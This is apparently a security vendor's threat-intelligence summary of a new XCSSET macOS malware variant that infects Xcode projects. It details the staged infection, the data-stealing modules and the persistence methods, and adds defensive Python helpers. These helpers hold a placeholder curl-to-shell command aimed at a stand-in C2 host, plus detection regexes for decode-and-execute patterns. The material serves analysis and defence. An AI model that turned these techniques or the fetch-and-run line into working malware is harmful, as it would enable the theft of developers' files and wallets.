
XCSSET Malware Evolves with Advanced Obfuscation and Persistence in Xcode Projects


PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.

Summary

Microsoft published a blog detailing a new variant of XCSSET, a modular macOS malware infecting Xcode projects, discovered during routine threat hunting. This is the first known XCSSET variant since 2022, featuring enhanced obfuscation, updated persistence mechanisms, and new infection strategies to steal files, system data, and digital wallet information. The malware infects Xcode projects during the build process, targeting developers who share project files. It uses encoded payloads, scripting languages, UNIX commands, and legitimate binaries to evade detection, often remaining fileless. The new variant employs obfuscated module names, randomized payload generation, and Base64 encoding for stealth.

Its three distinct persistence techniques allow execution when a new shell session starts, a fake Launchpad is opened, or a Git commit is made. The malware’s command-and-control (C2) server remains active, downloading additional modules, some of which are still under development. Microsoft has shared its findings with Apple and advises developers to follow security best practices to protect against this evolving threat.

Technical Details

The new XCSSET variant follows a structured four-stage infection chain, with the final payload executing multiple sub-routines.

First stage:

The infection begins when a compromised Xcode project is built, unknowingly executing an obfuscated payload. This payload undergoes three rounds of hex decoding before being passed as input to a shell command.

Once decoded, the payload sends a curl request to its command-and-control (C2) server at https[:]//bulknames[.]ru/a. The server's response is then directly executed via shell, facilitating further stages of the attack.
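An added analyst helper, not code from the original post or from Microsoft's write-up: it peels nested hex and Base64 layers the way the first-stage payload described above is unwrapped, then pulls out the URLs and shell-pipe patterns a triager checks first. The sample blob is constructed here around a placeholder command and the placeholder domain `c2.example.invalid`; the real stage-1 payload is not reproduced.

```python
import base64
import binascii
import re

# Constructed sample only: a placeholder curl-to-shell command wrapped in
# three rounds of hex encoding, the layering described for stage one.
# The real stage-1 payload and C2 domain are deliberately not reproduced.
INNER_COMMAND = "curl -s https://c2.example.invalid/a | sh"

def hex_wrap(text: str, rounds: int) -> str:
    """Hex-encode `text` `rounds` times (used only to build the samples)."""
    data = text.encode()
    for _ in range(rounds):
        data = binascii.hexlify(data)
    return data.decode()

SAMPLE_HEX3 = hex_wrap(INNER_COMMAND, 3)
SAMPLE_MIXED = base64.b64encode(hex_wrap(INNER_COMMAND, 1).encode()).decode()

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
URL_RE = re.compile(r"https?://[^\s'\"|]+")
SHELL_PIPE_RE = re.compile(r"\|\s*(?:ba|z)?sh\b|\b(?:ba|z)?sh\s+-c\b|\beval\b")

def peel_layers(blob: str, max_rounds: int = 16) -> tuple[str, list[str]]:
    """Strip nested hex/Base64 layers; return (innermost text, layer kinds
    removed, outermost first). Stops at the first layer that is not
    decodable or not UTF-8 so unrelated text is never mangled."""
    current, layers = blob.strip(), []
    for _ in range(max_rounds):
        if HEX_RE.match(current) and len(current) % 2 == 0:
            kind, raw = "hex", binascii.unhexlify(current)
        elif B64_RE.match(current) and len(current) % 4 == 0:
            kind, raw = "base64", base64.b64decode(current, validate=True)
        else:
            break
        try:
            current = raw.decode("utf-8")
        except UnicodeDecodeError:
            break
        layers.append(kind)
    return current, layers

def extract_indicators(blob: str) -> dict:
    """Decode a blob and report what an analyst would triage first."""
    text, layers = peel_layers(blob)
    return {"layers": layers, "urls": URL_RE.findall(text),
            "pipes_to_shell": bool(SHELL_PIPE_RE.search(text))}
```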

Second stage:

The second-stage payload, downloaded during the initial infection, gathers details about the compromised device’s operating system. This information, along with a default identifier/tag, is then transmitted to the C2 server. Based on the response, the server delivers an additional payload, which is immediately executed via shell, advancing the malware’s infection process.

Third stage:

The malware checks XProtect’s version (must be below 5287) and stops specific security-related processes. It then searches for a hidden file (.a) in the home directory, updating or creating it if absent. A new script is downloaded from the C2 server and executed via an AppleScript application, which is compiled and modified to run stealthily in the background. The malware hides its presence by modifying Info.plist to enable the LSUIElement key, ensuring it doesn’t appear in the Dock. After execution, it self-cleans by deleting the created files.

Fourth Stage:

The AppleScript application runs a shell command that decodes and executes a Base64-encoded script. This script extracts the default browser’s bundle identifier from com.apple.launchservices.secure.plist, defaulting to Safari. It then gathers system information, including macOS version, Safari version, firewall and SIP status, CPU details, and user locale, and sends it to the C2 server. The script redefines the log() function to transmit logs back to the attacker.

To evade analysis, it checks if the username is "demo" (likely belonging to the attacker) and verifies the device's serial number, exiting if it contains "JV3Q." The script then calls the boot() function with obfuscated module names. The boot() function determines which modules to load based on predefined filters. If none pass, it downloads and executes an AppleScript dynamically, ensuring minimal disk artifacts. The script can run these modules in either the foreground or background, depending on the wait flag.

The fourth-stage script retrieves sub-modules that are Base64-encoded and undergo multiple decoding iterations before being executed directly.

Sub-modules:

  • Seizecj (Steals system information): Steals system information and sends it to the C2 server, gathering details like installed applications, system apps, user-level LaunchAgents, XProtect version, and MRT version. It follows the same Base64 decoding process before execution.

  • fpzfcieoci (Lists Browser Extensions): Scans the affected device for installed browser extensions, searching predefined paths for relevant files. It extracts metadata from Firefox’s prefs.js and other browsers' manifest.json files, then logs the results in /tmp/out.txt before uploading them to the C2 server.

  • hxasoxtfd (Downloads Additional Modules): Requests a module name from the C2 server every 120 seconds and executes it using the boot() function. If the filters fail, it downloads and runs the payload directly, minimizing disk artifacts.

  • txzx_vostfdi (Steals Digital Wallet Data from Browsers): Requests a list of target paths from the C2 server and scans browser directories for cryptocurrency wallet extensions. It identifies relevant data based on specific extension identifiers provided in the received path list.

  • hfdieiz (Establishes Persistence): Ensures persistence using zshrc and Dock methods. It creates a com.apple.finder folder in ~/Library/Caches/, then generates an encoded payload by selecting a C2 server, encoding method (Base64 or xxd), and iteration count before execution.

  • Zshrc Method (Persistence Mechanism): Modifies the zsh configuration to ensure payload execution on new shell sessions. It checks the RESTORE_DEFAULT variable—if True, it removes ~/.zshrc_aliases; otherwise, it writes the payload to this file. It then ensures ~/.zshrc exists and appends a reference to ~/.zshrc_aliases if missing.

  • Dock Method (Persistence Mechanism): Downloads a signed dockutil tool from the C2 server to manage Dock items. It replaces Launchpad with a fake application that launches both the real Launchpad and a hidden payload. The method modifies Info.plist, updates the icon, and ensures persistence by replacing the Dock entry.

  • cozfi_xhh (Steals Notes from the Notes Application): Creates a fake Reminders application to steal notes from the macOS Notes app using JavaScript. It retrieves and saves notes as HTML files, modifies Info.plist, and ensures persistence. Finally, it exfiltrates the stolen notes to the C2 server.

  • vectfd_xhh (Launches application for modules): Creates fake applications for Xcode, Git, Finder, or Terminal to execute malicious payloads. It modifies plist entries, replaces icons, and ensures persistence using AppleScript. If execution fails due to TCC permission restrictions, it resets the TCC database and retries.

  • dfhsebxzod (Infects Xcode projects): Infects Xcode projects by modifying .pbxproj files to inject malicious payloads. It searches for xcodeproj directories and .zip archives containing project files, then alters build settings using one of three infection methods: RULE, TARGET, or FORCED_STRATEGY. The payload, encoded via xxd or Base64, executes a C2-fetched script during project compilation.

  • jez (Establishes persistence through Git commits): Establishes persistence through Git pre-commit hooks by injecting a payload into .git/hooks/pre-commit files. It searches for .git directories up to six levels deep, excluding system folders. If a pre-commit hook exists, it replaces its content; otherwise, it creates one. The payload executes upon each Git commit, ensuring persistent access.

  • uhsoxtfd_vostfd (Directory uploader): Exfiltrates files from a target directory, currently set to ~/Desktop/test (suggesting it's still in development). It checks for the folder’s existence and access permissions, resetting the TCC database if needed. Once access is granted, it archives the folder (excluding specific files) and uploads it to a C2 server, deleting the archive afterward.

  • fpfb (Directory listing): Executes "ls -la ~/Desktop" to list files and directories on the user’s Desktop. It then uploads the output to a C2 server, allowing attackers to monitor file activity remotely.

  • vectfd (Specific files exfiltration): Searches for files matching *test.txt in the user's home directory, excluding certain directories and large files. It archives, exfiltrates, and deletes the retrieved files, indicating ongoing development.

Recommendations

To mitigate this risk, developers and organizations should:

  • Monitor Xcode projects for unauthorized modifications, especially in .pbxproj files and build scripts.

  • Restrict execution of untrusted AppleScripts and review system integrity regularly.

  • Check Git repositories for suspicious pre-commit hooks and unexpected modifications.

  • Harden macOS security settings, including TCC permissions, XProtect updates, and SIP enforcement.

  • Monitor network traffic for suspicious C2 communications and implement endpoint detection solutions to detect fileless execution techniques.
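An added audit script that turns the first three recommendations into checks, written for this page and not taken from the original post or any vendor tool: it looks for the zshrc-method artefacts (~/.zshrc_aliases and a reference to it in ~/.zshrc), the ~/Library/Caches/com.apple.finder folder, and .pbxproj build phases or .git/hooks/pre-commit files that decode an embedded blob with xxd or base64 and pipe it into a shell. run_demo() builds a constructed fake home directory with placeholder contents so the checks can be exercised offline; on a real machine call audit_home(Path.home()).

```python
import os
import re
import tempfile
from pathlib import Path

# Script text that decodes an embedded blob with xxd or base64 and pipes the
# result into a shell, as described for the infected build phases and hooks.
DECODE_EXEC = re.compile(r"(xxd\s+-r\s+-p|base64\s+(?:-d|-D|--decode)).*?\|\s*(?:ba|z)?sh\b", re.S)

def audit_home(home: Path) -> list[tuple[str, str]]:
    """Return sorted (finding, relative-path) pairs for XCSSET-style artefacts."""
    findings = []
    zshrc, aliases = home / ".zshrc", home / ".zshrc_aliases"
    if aliases.exists():
        findings.append(("zshrc_aliases_present", ".zshrc_aliases"))
    if zshrc.exists() and ".zshrc_aliases" in zshrc.read_text(errors="replace"):
        findings.append(("zshrc_references_aliases", ".zshrc"))
    if (home / "Library/Caches/com.apple.finder").is_dir():
        findings.append(("finder_cache_dir", "Library/Caches/com.apple.finder"))
    for dirpath, _, filenames in os.walk(home):
        for name in filenames:
            path = Path(dirpath) / name
            is_hook = name == "pre-commit" and dirpath.endswith(os.path.join(".git", "hooks"))
            if not (is_hook or name.endswith(".pbxproj")):
                continue  # only build-phase files and pre-commit hooks are inspected
            if DECODE_EXEC.search(path.read_text(errors="replace")):
                kind = "precommit_decode_exec" if is_hook else "pbxproj_decode_exec"
                findings.append((kind, str(path.relative_to(home))))
    return sorted(findings)

def run_demo() -> list[tuple[str, str]]:
    """Audit a constructed fake home directory (placeholder sample data only)."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)
        files = {  # constructed contents; the decoded blobs are harmless echo commands
            ".zshrc": "export PATH=$PATH:/opt/bin\n[ -f ~/.zshrc_aliases ] && source ~/.zshrc_aliases\n",
            ".zshrc_aliases": "# constructed placeholder, not a real payload\n",
            "proj/Demo.xcodeproj/project.pbxproj": 'shellScript = "echo 6563686f | xxd -r -p | sh";\n',
            "repo/.git/hooks/pre-commit": "#!/bin/sh\necho ZWNobyBoaQ== | base64 -d | sh\n",
            "clean/App.xcodeproj/project.pbxproj": 'shellScript = "swiftlint --strict";\n',
        }
        for rel, text in files.items():
            (home / rel).parent.mkdir(parents=True, exist_ok=True)
            (home / rel).write_text(text)
        return audit_home(home)
```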

Conclusion

The new XCSSET variant showcases a highly structured and multi-stage infection chain, demonstrating a sophisticated evolution in macOS malware. By leveraging Xcode project infections, persistence mechanisms, and stealthy execution techniques, it effectively compromises developer environments while ensuring long-term access to infected systems. The four-stage attack starts with an obfuscated payload executed via compromised Xcode projects, gradually advancing through reconnaissance, security evasion, and stealthy execution. The malware carefully adapts its behavior based on system conditions, checking security controls, modifying system files, and resetting TCC permissions to maintain persistence.

The sub-modules enable a wide range of malicious activities, including data theft, browser extension enumeration, cryptocurrency wallet targeting, and system reconnaissance. Furthermore, advanced persistence techniques, such as Git pre-commit hooks, zshrc modifications, and Dock-based payload execution, highlight the malware’s capability to remain undetected for extended periods. This variant also incorporates on-the-fly payload execution techniques, avoiding disk artifacts by downloading and executing modules dynamically. The use of multiple encoding and obfuscation methods makes static detection challenging, while AppleScript-based execution ensures seamless background operations.
